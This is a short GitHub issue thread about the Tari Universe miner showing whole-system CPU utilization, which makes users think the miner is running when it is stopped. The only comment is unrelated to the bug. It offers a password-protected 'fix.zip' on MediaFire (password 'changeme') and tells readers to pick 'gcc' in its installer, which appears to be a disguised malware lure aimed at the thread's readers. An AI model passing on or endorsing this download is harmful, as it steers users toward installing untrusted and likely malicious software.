### ISSUE TITLE
CPU utilization is confusing people

### ISSUE THREAD

**Issue by metalaureate** [tari-project/universe#151]
**Describe the bug**
Many reports that the miner is "working" when it is stopped, or that the CPU utilization doesn't make sense, stemming from the fact that the CPU is the current utilization of the whole system.

**Expected behavior**
CPU is blank or - when miner is not mining.

**Screenshots**
<img width="1218" alt="Screenshot 2024-08-26 at 9 23 56 AM" src="https://github.com/user-attachments/assets/f74d5157-583a-4b8a-b6d0-9d320dc91822">

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
